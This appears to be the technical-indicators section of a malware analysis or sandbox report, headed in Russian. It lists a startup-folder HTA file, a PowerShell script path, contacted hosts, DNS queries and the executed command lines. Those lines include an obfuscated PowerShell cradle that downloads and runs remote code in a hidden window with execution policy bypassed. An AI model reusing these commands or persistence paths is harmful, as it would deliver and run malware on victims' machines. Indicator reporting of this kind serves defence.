Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\run.hta
- C:\users\public\microsoft.ps1
- 'ah###adel.work':80
- 'ia#####3.us.archive.org':443
- 'ia#####3.us.archive.org':443
- DNS ASK ah###adel.work
- DNS ASK ia#####3.us.archive.org
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ah###adel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ah###adel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X